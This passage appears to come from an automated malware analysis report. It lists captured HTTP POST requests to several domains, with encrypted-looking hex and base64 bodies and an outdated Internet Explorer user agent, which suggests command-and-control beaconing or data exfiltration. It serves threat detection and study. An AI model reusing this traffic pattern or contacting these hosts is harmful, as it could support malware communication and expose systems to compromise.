2f 61 69 4a 79 33 50 6b 55 71 79 31 53 6c 6d 4f 43 69 4a 7a 79 63 55 65 44 74 4c 4a 37 39 70 32 69 77 7a 2b 64 2f 61 5a 77 79 6d 6c 69 2f 48 64 33 5a 69 2f 79 69 46 71 49 31 36 61 63 4d 77 69 44 64 37 4c 4e 6e 67 55 68 64 61 70 41 39 58 6b 45 5a 53 4f 71 78 33 35 56 6a 50 61 50 6e 74 41 45 5a 34 68 45 6c 53 58 42 78 56 4a 32 61 50 53 6b 61 71 59 59 65 31 4f 4b 4e 67 41 41 50 4f 6b 43 31 71 56 55 2f 36 63 42 79 30 55 33 67 44 55 48 75 76 32 4c 66 76 45 6e 41 68 69 63 58 46 73 6b 2b 65 38 66 74 4b 38 33 34 67 68 79 6a 77 62 70 6f 6c 71 52 59 32 6c 38 49 6b 6d 43 74 4c 31 67 52 6a 42 56 67 4f 50 52 48 61 39 36 4b 31 38 59 61 32 4f 67 76 44 6f 33 36 79 4b 4a 45 6a 6b 5a 57 57 67 73 6e 76 68 44 53 34 6a 53 51 32 6b 70 62 35 7a 66 61 56 62 54 39 67 74 67 31 2f 79 74 56 39 31 6a 54 58 6e 7a 39 4f 2f 56 65 46 56 71 61 6c 79 46 74 77 57 57 57 73 54 59 75 34 51 4c 35 39 52 6f 32 66 54 64 32 2f 34 42 44 4f 6b 64 78 30 57 74 51 34 66 65 6a 7a 48 68 49 6c 70 35 51 47 55 64 6e 31 5a 33 37 55 50 59 4a 31 37 59 63 6d 75 39 48 2b 7a 78 67 33 75 34 6d 4e 64 67 55 4b 30 45 72 35 2f 51 54 73 32 68 66 42 76 43 37 76 6d 72 48 47 63 79 78 6b 2b 74 55 47 2f 79 43 42 70 6b 68 55 47 6f 74 48 41 4c 37 39 39 39 35 64 50 49 3d Data Ascii: V1I0SPe7Ytgj78NJZuh160ABE+utawsRGw9A2Waef0p/Z7M9F2dYQeCYqn3Ja6JR2KWurNGo6DMVssx9lQOuWfk7hPezxRL4MKDTSNLZll/7daRt2TW8rG4t2PU9DZ5Us9favUGDjkIIa0vEqebycRcqsZzAnrl/adHjHnhteK/aiJy3PkUqy1SlmOCiJzycUeDtLJ79p2iwz+d/aZwymli/Hd3Zi/yiFqI16acMwiDd7LNngUhdapA9XkEZSOqx35VjPaPntAEZ4hElSXBxVJ2aPSkaqYYe1OKNgAAPOkC1qVU/6cBy0U3gDUHuv2LfvEnAhicXFsk+e8ftK834ghyjwbpolqRY2l8IkmCtL1gRjBVgOPRHa96K18Ya2OgvDo36yKJEjkZWWgsnvhDS4jSQ2kpb5zfaVbT9gtg1/ytV91jTXnz9O/VeFVqalyFtwWWWsTYu4QL59Ro2fTd2/4BDOkdx0WtQ4fejzHhIlp5QGUdn1Z37UPYJ17Ycmu9H+zxg3u4mNdgUK0Er5/QTs2hfBvC7vmrHGcyxk+tUG/yCBpkhUGotHAL79995dPI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.x0c.comCache-Control: no-cacheData Raw: 75 68 74 6e 55 6f 51 49 31 52 44 35 4b 44 6c 65 6e 2f 71 49 7a 56 63 36 34 71 75 38 65 38 53 5a 2b 4f 57 32 47 4e 46 76 6d 7a 35 6e 34 6f 4a 42 75 37 6c 51 46 68 43 58 52 39 47 36 35 58 32 48 74 47 63 4c 58 34 78 6c 6c 4d 65 44 76 73 33 44 62 41 6a 44 39 33 57 4b 51 32 71 39 62 6f 53 74 4e 63 78 71 31 46 52 35 4f 4d 57 63 68 39 70 47 71 6d 4a 4b 76 50 4c 4a 69 74 36 54 44 38 68 65 54 43 63 46 48 72 6f 75 71 57 77 33 75 76 36 4d 64 66 54 65 71 65 7a 58 32 76 70 67 42 35 71 47 45 76 54 54 57 2b 48 72 30 52 42 46 32 58 63 50 39 41 73 46 79 38 75 2b 2f 54 75 48 41 6c 43 71 70 64 6c 67 32 6d 68 48 44 5a 69 35 46 51 35 52 65 74 6a 53 6b 63 45 78 52 42 74 31 48 56 66 50 62 31 55 70 59 4f 68 55 76 55 45 37 47 67 63 74 4c 54 45 77 66 4a 32 47 36 4c 5a 56 67 2b 47 41 49 66 2b 6a 62 55 65 47 36 64 46 66 5a 44 72 33 6e 62 6b 52 78 43 32 76 33 4c 6c 43 56 4e 70 46 36 78 46 76 76 2f 61 56 5a 73 65 45 52 38 41 4b 6c 4e 35 57 61 48 53 41 68 6e 43 51 67 71 4f 70 51 54 75 30 6f 41 32 39 45 6d 70 30 61 50 36 4d 6b 34 31 2b 6e 7a 35 79 59 64 47 46 36 4b 77 6c 2f 43 61 54 32 77 66 42 54 63 6d 4d 37 78 72 4f 36 4e 49 39 55 4d 57 50 65 62 73 59 68 51 35 62 75 6f 55 34 64 35 70 74 39 48 76 55 59 4a 53 71 4a 64 52 73 38 61 39 61 6c 74 73 6f 7a 36 48 79 38 65 38 79 44 77 69 53 66 61 47 7a 6e 65 31 32 69 33 74 4b 2b 57 58 4e 76 33 36 52 67 58 4d 55 68 30 5a 6f 77 39 56 45 64 6e 71 62 4e 55 51 2f 53 4f 33 5a 2f 55 32 61 68 63 76 58 5a 7a 7a 77 45 70 47 44 45 5a 2f 2b 67 54 62 71 6b 4a 36 58 79 34 6c 74 64 32 6a 4e 63 44 37 71 58 37 39 42 67 77 74 5a 33 61 4b 5a 7a 6c 6a 42 79 46 33 36 4a 72 78 4b 42 6a 42 2f 6c 57 52 2f 4f 61 69 55 76 4d 45 44 6b 79 2f 6f 6e 76 49 54 41 73 61 44 69 4a 78 31 39 4f 2b 74 73 53 6d 54 72 65 4e 76 Data Ascii: uhtnUoQI1RD5KDlen/qIzVc64qu8e8SZ+OW2GNFvmz5n4oJBu7lQFhCXR9G65X2HtGcLX4xllMeDvs3DbAjD93WKQ2q9boStNcxq1FR5OMWch9pGqmJKvPLJit6TD8heTCcFHrouqWw3uv6MdfTeqezX2vpgB5qGEvTTW+Hr0RBF2XcP9AsFy8u+/TuHAlCqpdlg2mhHDZi5FQ5RetjSkcExRBt1HVfPb1UpYOhUvUE7GgctLTEwfJ2G6LZVg+GAIf+jbUeG6dFfZDr3nbkRxC2v3LlCVNpF6xFvv/aVZseER8AKlN5WaHSAhnCQgqOpQTu0oA29Emp0aP6Mk41+nz5yYdGF6Kwl/CaT2wfBTcmM7xrO6NI9UMWPebsYhQ5buoU4d5pt9HvUYJSqJdRs8a9altsoz6Hy8e8yDwiSfaGzne12i3tK+WXNv36RgXMUh0Zow9VEdnqbNUQ/SO3Z/U2ahcvXZzzwEpGDEZ/+gTbqkJ6Xy4ltd2jNcD7qX79BgwtZ3aKZzljByF36JrxKBjB/lWR/OaiUvMEDky/onvITAsaDiJx19O+tsSmTreNv
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 43 42 48 34 4b 6e 42 77 79 78 41 6d 64 2f 6e 73 67 30 6d 41 49 43 4f 68 68 53 49 59 6f 49 6b 71 70 4c 61 5a 31 61 33 73 34 66 48 62 73 30 4e 51 2b 6a 6d 37 73 4d 65 65 45 75 47 6f 79 78 4a 71 69 65 6f 74 37 39 33 5a 6b 38 5a 33 71 50 72 4f 5a 75 4c 4b 67 72 54 4f 4f 35 6b 32 63 74 41 35 6f 33 71 6c 48 31 50 6c 6d 41 6d 42 55 43 79 6a 63 54 73 6b 79 45 74 66 78 6c 6c 62 66 6f 33 66 34 45 43 6d 52 43 38 62 6c 78 38 6a 32 2b 38 4a 74 53 66 50 77 31 35 45 35 62 33 64 6d 6f 71 54 59 38 48 46 4c 6a 56 4b 6a 50 7a 37 71 74 71 57 41 6c 38 71 68 35 70 48 33 76 4c 75 50 55 7a 55 74 46 57 73 51 63 38 47 50 4e 6f 6e 69 4b 46 73 6d 33 43 53 55 41 6e 2b 30 38 6d 72 36 55 32 4c 6e 42 4c 52 6f 39 62 68 6a 30 35 54 75 54 59 6b 5a 56 33 6e 79 45 77 56 72 2f 54 61 42 77 33 7a 68 35 56 69 32 37 70 74 62 4a 7a 34 66 70 6b 4f 42 44 33 2b 37 50 51 32 2b 63 56 62 69 68 75 53 58 52 61 34 2f 6b 56 4c 59 76 2b 67 45 75 54 36 6b 78 7a 55 37 5a 62 34 33 4e 59 33 52 45 6f 6a 6e 44 70 42 75 6e 6f 54 6f 5a 43 32 49 4d 31 45 6b 50 34 46 35 6d 50 65 68 64 64 7a 63 78 6d 49 50 6a 75 52 6e 49 31 52 66 6a 6c 36 5a 34 50 67 74 74 41 31 4f 58 5a 50 45 5a 33 48 67 38 43 31 4b 2b 30 70 36 58 67 43 6d 7a 63 4b 79 54 53 44 71 53 4b 57 76 50 32 6c 66 38 52 73 69 63 66 75 6c 4e 4c 6d 49 46 39 61 46 79 58 33 78 4f 68 6f 69 57 46 72 78 76 6c 72 4d 58 41 68 4e 56 55 6d 6b 4b 38 53 36 44 49 42 54 4e 6f 73 74 77 2f 4c 6c 6b 50 66 4c 4e 44 6a 2b 35 34 38 4a 4a 65 42 50 6c 64 7a 71 78 2f 32 30 69 44 42 79 4f 33 76 45 39 6c 69 33 2b 4b 73 41 6f 69 6e 4f 7a 79 42 34 48 6e 73 34 56 56 6c 42 50 38 70 6f 58 64 45 44 61 33 70 49 73 38 39 64 68 4b 51 48 62 6f 55 62 56 69 52 6b 56 41 73 53 53 59 2f 69 5a 63 59 6d 69 4d 45 63 31 39 7a 6d 41 3d 3d Data Ascii: CBH4KnBwyxAmd/nsg0mAICOhhSIYoIkqpLaZ1a3s4fHbs0NQ+jm7sMeeEuGoyxJqieot793Zk8Z3qPrOZuLKgrTOO5k2ctA5o3qlH1PlmAmBUCyjcTskyEtfxllbfo3f4ECmRC8blx8j2+8JtSfPw15E5b3dmoqTY8HFLjVKjPz7qtqWAl8qh5pH3vLuPUzUtFWsQc8GPNoniKFsm3CSUAn+08mr6U2LnBLRo9bhj05TuTYkZV3nyEwVr/TaBw3zh5Vi27ptbJz4fpkOBD3+7PQ2+cVbihuSXRa4/kVLYv+gEuT6kxzU7Zb43NY3REojnDpBunoToZC2IM1EkP4F5mPehddzcxmIPjuRnI1Rfjl6Z4PgttA1OXZPEZ3Hg8C1K+0p6XgCmzcKyTSDqSKWvP2lf8RsicfulNLmIF9aFyX3xOhoiWFrxvlrMXAhNVUmkK8S6DIBTNostw/LlkPfLNDj+548JJeBPldzqx/20iDByO3vE9li3+KsAoinOzyB4Hns4VVlBP8poXdEDa3pIs89dhKQHboUbViRkVAsSSY/iZcYmiMEc19zmA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 49 36 34 47 52 74 32 70 59 74 69 37 57 76 50 58 46 4b 47 30 48 78 61 36 31 5a 69 4c 48 75 45 67 59 56 43 57 55 4d 31 36 47 52 61 70 4f 6e 35 4e 59 78 65 65 76 42 6a 6a 6d 41 61 50 4c 6c 6e 73 4d 5a 79 6a 76 41 31 48 78 73 4a 69 38 76 6a 69 30 4e 71 36 58 78 6c 54 72 55 58 52 4f 59 33 49 2b 79 73 6d 66 2f 66 37 6a 71 55 47 75 4c 4b 63 53 4a 58 2f 64 53 4e 76 39 78 62 68 75 4d 2b 6e 63 7a 56 4c 6c 36 69 52 77 5a 4b 6f 2f 32 4d 4d 33 63 69 38 6f 69 6b 6d 69 76 4d 6e 42 59 7a 30 66 38 30 48 55 6b 31 46 4f 4b 63 39 46 70 49 41 41 75 54 56 36 67 42 6f 4c 66 79 67 41 54 67 76 78 48 51 2b 49 2f 6d 71 38 69 58 64 67 79 6b 5a 33 58 79 31 57 58 7a 6a 50 76 48 65 73 73 35 4c 5a 6c 35 53 59 78 35 64 62 53 33 7a 63 4e 6f 71 79 67 41 46 72 66 61 61 6f 76 35 62 64 76 6a 72 6e 35 33 35 6a 53 31 53 54 54 46 6e 4b 51 61 53 76 61 43 4a 61 7a 47 54 56 68 6a 6d 54 2b 37 34 4b 6f 42 4c 59 50 46 53 33 38 35 73 72 51 56 31 56 37 78 38 37 6d 6a 54 2f 38 63 69 50 32 74 66 75 6a 76 36 31 4a 4b 41 32 64 46 55 5a 46 75 38 62 56 41 66 7a 45 54 50 55 31 65 48 73 54 30 38 4d 31 6b 7a 32 50 34 6e 4d 47 65 6e 4d 47 35 4e 31 47 79 69 6e 65 66 50 7a 35 5a 34 53 35 42 61 62 32 4d 57 45 36 32 6f 6c 77 46 33 4a 36 57 75 34 75 79 4c 56 39 56 39 47 76 31 36 62 6e 4f 76 61 48 76 74 66 2f 41 68 52 77 42 73 70 37 77 42 41 34 65 76 62 6b 52 57 77 7a 4e 44 53 66 6f 4e 2f 7a 66 59 58 41 4b 42 34 52 79 39 52 6b 56 61 5a 4e 5a 4a 48 47 67 74 79 6f 78 62 50 2b 66 4e 36 2f 53 33 65 6c 74 50 6c 66 44 78 4f 31 50 2b 49 64 34 38 74 42 6c 32 71 66 38 78 73 68 51 49 45 6f 79 38 6e 34 47 44 38 52 55 4f 49 6e 56 6c 7a 72 6c 64 4b 65 5a 57 53 64 6b 58 74 33 55 32 52 32 30 4d 51 2b 63 3d Data Ascii: I64GRt2pYti7WvPXFKG0Hxa61ZiLHuEgYVCWUM16GRapOn5NYxeevBjjmAaPLlnsMZyjvA1HxsJi8vji0Nq6XxlTrUXROY3I+ysmf/f7jqUGuLKcSJX/dSNv9xbhuM+nczVLl6iRwZKo/2MM3ci8oikmivMnBYz0f80HUk1FOKc9FpIAAuTV6gBoLfygATgvxHQ+I/mq8iXdgykZ3Xy1WXzjPvHess5LZl5SYx5dbS3zcNoqygAFrfaaov5bdvjrn535jS1STTFnKQaSvaCJazGTVhjmT+74KoBLYPFS385srQV1V7x87mjT/8ciP2tfujv61JKA2dFUZFu8bVAfzETPU1eHsT08M1kz2P4nMGenMG5N1GyinefPz5Z4S5Bab2MWE62olwF3J6Wu4uyLV9V9Gv16bnOvaHvtf/AhRwBsp7wBA4evbkRWwzNDSfoN/zfYXAKB4Ry9RkVaZNZJHGgtyoxbP+fN6/S3eltPlfDxO1P+Id48tBl2qf8xshQIEoy8n4GD8RUOInVlzrldKeZWSdkXt3U2R20MQ+c=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 75 69 54 4e 55 59 4b 37 57 74 69 6e 30 74 53 43 64 55 52 79 72 77 57 6f 43 47 6d 53 52 51 47 67 31 6e 45 42 53 46 6b 79 31 42 46 46 59 39 52 55 37 71 63 5a 62 53 48 4d 6b 4a 78 66 74 34 51 50 76 74 41 49 4e 33 38 4c 70 47 38 6e 48 4e 47 52 59 56 38 4f 38 63 55 46 7a 5a 39 67 76 5a 43 53 45 76 68 34 34 45 7a 47 57 4b 67 77 6b 56 58 64 4a 62 46 39 4c 42 38 65 46 2f 6a 66 55 32 79 6a 34 35 55 53 6b 49 74 6d 55 48 78 6d 6f 30 61 53 4d 6c 77 48 34 67 42 74 48 38 54 61 44 77 66 51 66 31 45 6f 50 66 49 72 76 47 6c 39 55 55 37 59 46 55 56 68 50 6f 4b 62 30 79 59 48 50 6e 73 4c 2f 6c 41 4c 54 7a 76 2f 6d 34 4d 70 2f 49 78 49 57 62 32 7a 2b 7a 72 63 62 5a 6a 6a 66 67 6d 6b 5a 71 6f 77 63 4c 33 34 45 36 47 6b 6b 56 54 79 6c 4c 5a 4d 76 6b 41 36 46 79 53 49 30 73 6b 57 38 68 75 6f 74 6b 74 4c 4d 30 50 74 36 77 52 31 4f 71 76 39 31 5a 66 41 6f 4c 72 72 79 71 64 53 32 46 49 75 34 77 54 79 42 37 72 4f 74 43 74 6d 57 39 55 58 2b 77 78 31 76 65 6b 72 45 32 52 4c 49 2f 52 2f 67 4f 68 6f 72 2f 42 33 4f 53 45 62 78 52 58 65 33 61 61 68 61 45 31 5a 45 71 67 31 58 41 69 48 39 36 56 76 61 6b 72 6d 64 67 73 32 46 39 38 53 38 47 38 68 42 42 59 54 36 30 55 77 32 77 37 63 63 44 76 77 59 53 45 6e 47 79 64 31 57 51 45 64 53 36 61 55 74 37 70 4b 4a 41 66 61 49 73 58 43 68 39 62 44 39 73 39 43 54 72 39 34 71 69 44 49 41 71 36 63 48 6f 51 34 7a 4e 52 54 54 43 42 4a 77 5a 6f 39 41 36 37 65 69 71 74 38 38 7a 75 41 6d 30 33 51 56 65 45 75 64 50 54 63 78 50 58 4f 4d 32 48 55 62 31 50 4e 55 44 59 2f 59 6b 71 62 58 31 55 30 47 41 4d 55 66 46 58 48 6c 48 69 64 65 4f 42 66 72 53 31 6d 7a 46 30 33 2b 73 53 56 4f 35 74 58 45 51 3d 3d Data Ascii: uiTNUYK7Wtin0tSCdURyrwWoCGmSRQGg1nEBSFky1BFFY9RU7qcZbSHMkJxft4QPvtAIN38LpG8nHNGRYV8O8cUFzZ9gvZCSEvh44EzGWKgwkVXdJbF9LB8eF/jfU2yj45USkItmUHxmo0aSMlwH4gBtH8TaDwfQf1EoPfIrvGl9UU7YFUVhPoKb0yYHPnsL/lALTzv/m4Mp/IxIWb2z+zrcbZjjfgmkZqowcL34E6GkkVTylLZMvkA6FySI0skW8huotktLM0Pt6wR1Oqv91ZfAoLrryqdS2FIu4wTyB7rOtCtmW9UX+wx1vekrE2RLI/R/gOhor/B3OSEbxRXe3aahaE1ZEqg1XAiH96Vvakrmdgs2F98S8G8hBBYT60Uw2w7ccDvwYSEnGyd1WQEdS6aUt7pKJAfaIsXCh9bD9s9CTr94qiDIAq6cHoQ4zNRTTCBJwZo9A67eiqt88zuAm03QVeEudPTcxPXOM2HUb1PNUDY/YkqbX1U0GAMUfFXHlHideOBfrS1mzF03+sSVO5tXEQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWk1MSXhnY2ZZR09Fb1E4UUxTcm9qUUFBQUVBIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaTUxJeGdjZllHT0VvUThRTFNyb2pRQUFBRUEiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU3MiIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiODQuMTcuNTIuNDMiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjU4OTQ0IiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY5MDQ4Njk4Mi4xMDg0NzUsIlJFUVVFU1RfVElNRSI6MTY5MDQ4Njk4MiwiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6Ijg0LjE3LjUyLjQzIn0%3D
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 5a 38 36 5a 6b 61 45 47 38 42 41 6d 68 6b 46 62 41 47 2f 38 59 48 70 6e 58 71 4b 66 64 4b 77 41 5a 66 38 42 70 48 64 30 42 48 72 79 71 69 76 32 54 78 75 6d 4b 72 6c 58 47 68 48 37 39 72 49 64 63 43 63 4e 2f 45 51 2f 55 63 49 77 77 34 55 72 6e 35 66 66 73 4f 77 39 45 45 73 31 44 4f 44 4a 5a 79 71 69 57 51 41 6a 71 32 52 38 6e 70 68 69 65 4b 4a 63 2f 6e 36 45 73 54 67 35 45 67 55 48 79 79 41 63 47 59 56 50 64 38 45 70 75 2b 32 6b 4a 55 33 68 50 49 68 50 33 72 36 4d 44 6a 6b 4a 4e 44 77 38 53 54 55 62 53 49 70 73 66 76 39 47 4c 47 47 2f 63 50 57 74 6f 4a 6f 37 78 63 56 69 56 50 43 71 6a 41 52 42 48 78 61 76 7a 67 4d 7a 4d 32 42 39 51 73 44 6d 4b 38 41 37 6b 48 30 58 56 4b 4f 6c 75 5a 2f 42 51 6b 43 37 56 48 65 65 4a 55 64 45 2b 44 50 4f 2b 36 63 33 64 61 2f 5a 5a 54 56 2b 30 74 51 50 43 61 2b 30 5a 6b 50 38 48 55 64 35 34 34 6a 56 76 7a 74 47 31 35 6e 38 51 55 67 30 72 44 6f 43 30 37 36 65 4f 38 6d 36 54 6d 5a 49 45 68 49 4d 53 57 32 4f 44 58 57 4f 2f 32 53 6b 73 68 31 6b 56 7a 76 4d 4a 2f 64 38 6c 2b 4a 58 46 69 72 58 30 43 4e 2f 39 61 35 39 68 72 6b 4c 44 35 54 6d 2f 2b 70 6f 4e 77 31 6b 50 62 56 37 67 61 74 4d 73 33 6e 74 70 39 63 33 67 50 4d 31 63 39 69 6e 55 7a 43 6c 2f 35 4f 55 39 62 6d 69 67 70 79 4e 35 57 77 71 72 71 39 36 31 47 4f 4c 50 31 36 77 30 75 55 34 71 4f 71 47 33 6d 56 50 67 65 74 36 43 68 6b 33 4d 75 43 71 51 2f 6d 37 61 6d 41 69 38 73 52 6d 58 55 4a 64 30 76 64 50 55 6f 49 5a 4b 6e 75 61 6a 46 36 6b 38 73 63 62 71 77 70 62 68 34 51 66 37 53 61 4e 70 4d 4f 52 7a 61 4d 47 5a 6f 48 4d 6c 48 64 72 57 79 74 6a 6f 33 43 6a 4a 49 62 68 4f 41 63 3d Data Ascii: Z86ZkaEG8BAmhkFbAG/8YHpnXqKfdKwAZf8BpHd0BHryqiv2TxumKrlXGhH79rIdcCcN/EQ/UcIww4Urn5ffsOw9EEs1DODJZyqiWQAjq2R8nphieKJc/n6EsTg5EgUHyyAcGYVPd8Epu+2kJU3hPIhP3r6MDjkJNDw8STUbSIpsfv9GLGG/cPWtoJo7xcViVPCqjARBHxavzgMzM2B9QsDmK8A7kH0XVKOluZ/BQkC7VHeeJUdE+DPO+6c3da/ZZTV+0tQPCa+0ZkP8HUd544jVvztG15n8QUg0rDoC076eO8m6TmZIEhIMSW2ODXWO/2Sksh1kVzvMJ/d8l+JXFirX0CN/9a59hrkLD5Tm/+poNw1kPbV7gatMs3ntp9c3gPM1c9inUzCl/5OU9bmigpyN5Wwqrq961GOLP16w0uU4qOqG3mVPget6Chk3MuCqQ/m7amAi8sRmXUJd0vdPUoIZKnuajF6k8scbqwpbh4Qf7SaNpMORzaMGZoHMlHdrWytjo3CjJIbhOAc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6c 34 5a 68 6e 32 2b 42 66 74 6a 6b 6b 39 50 4f 6a 73 42 45 52 6e 68 39 6e 2f 4b 46 79 69 4f 4f 45 32 6a 69 68 57 65 59 71 39 47 50 7a 44 39 47 76 67 46 57 38 49 57 4f 76 56 33 59 76 39 56 73 36 61 31 49 65 44 4f 63 52 49 47 55 42 66 38 2f 42 6d 4f 2f 42 68 69 61 79 41 30 2b 72 42 6f 38 6d 6f 4e 77 63 75 43 79 61 6a 41 51 74 56 4b 4c 63 39 58 51 4d 30 65 45 76 42 59 72 72 48 45 34 6f 31 6a 6a 6e 38 4d 70 4d 37 53 73 62 56 77 65 6b 65 4d 6a 4b 43 61 5a 4c 70 73 47 50 33 5a 73 54 7a 66 65 6f 47 2b 53 67 52 53 5a 62 78 55 50 46 41 47 42 72 78 46 34 30 46 6b 39 51 69 30 6a 6d 65 75 45 52 4d 76 74 37 43 35 4a 32 69 44 50 71 6b 51 45 37 56 51 44 33 71 65 52 4a 54 33 46 4a 79 6e 41 4f 30 78 46 70 4c 58 54 76 4f 6b 68 6f 33 44 33 31 6f 38 63 41 68 76 70 44 72 49 63 6b 4b 51 56 52 68 34 48 53 67 37 72 64 6a 5a 70 6e 41 50 66 39 65 6d 65 78 58 36 2f 71 75 70 30 4a 57 6a 68 4d 43 2b 42 6d 71 54 66 56 53 73 43 2f 31 52 77 63 33 58 56 66 65 51 52 71 2b 56 44 7a 76 77 6f 51 30 4d 32 54 6a 39 4e 73 31 44 69 78 42 49 37 55 4a 2f 5a 5a 33 4f 37 47 5a 44 64 46 71 52 4e 5a 7a 6c 4b 55 66 45 4a 42 78 76 62 31 4b 6b 4f 63 6e 6c 79 46 4c 6a 4e 44 38 67 2b 36 4f 73 4a 2b 68 4f 32 31 31 43 34 53 74 6a 4e 65 55 6e 52 38 2b 39 6b 33 78 77 38 64 78 6d 33 62 56 72 6d 73 68 42 50 49 67 75 56 64 70 6f 4d 75 33 75 59 6e 36 2f 71 51 78 6e 4d 4a 32 6d 4f 42 5a 44 76 76 44 6d 58 4a 42 38 39 2f 46 77 42 39 72 42 75 4c 6b 55 48 30 6a 7a 55 4c 4b 51 4b 69 69 78 72 59 4b 51 68 54 52 69 49 46 4e 49 5a 53 34 42 66 37 70 6f 69 66 48 34 48 61 50 47 75 79 54 45 6a 54 4d 37 47 35 51 59 63 57 6c 4c 32 43 55 39 2f 42 4d 71 37 4e 38 48 67 48 72 63 43 7a 6b 73 34 57 41 3d 3d Data Ascii: l4Zhn2+Bftjkk9POjsBERnh9n/KFyiOOE2jihWeYq9GPzD9GvgFW8IWOvV3Yv9Vs6a1IeDOcRIGUBf8/BmO/BhiayA0+rBo8moNwcuCyajAQtVKLc9XQM0eEvBYrrHE4o1jjn8MpM7SsbVwekeMjKCaZLpsGP3ZsTzfeoG+SgRSZbxUPFAGBrxF40Fk9Qi0jmeuERMvt7C5J2iDPqkQE7VQD3qeRJT3FJynAO0xFpLXTvOkho3D31o8cAhvpDrIckKQVRh4HSg7rdjZpnAPf9emexX6/qup0JWjhMC+BmqTfVSsC/1Rwc3XVfeQRq+VDzvwoQ0M2Tj9Ns1DixBI7UJ/ZZ3O7GZDdFqRNZzlKUfEJBxvb1KkOcnlyFLjND8g+6OsJ+hO211C4StjNeUnR8+9k3xw8dxm3bVrmshBPIguVdpoMu3uYn6/qQxnMJ2mOBZDvvDmXJB89/FwB9rBuLkUH0jzULKQKiixrYKQhTRiIFNIZS4Bf7poifH4HaPGuyTEjTM7G5QYcWlL2CU9/BMq7N8HgHrcCzks4WA==
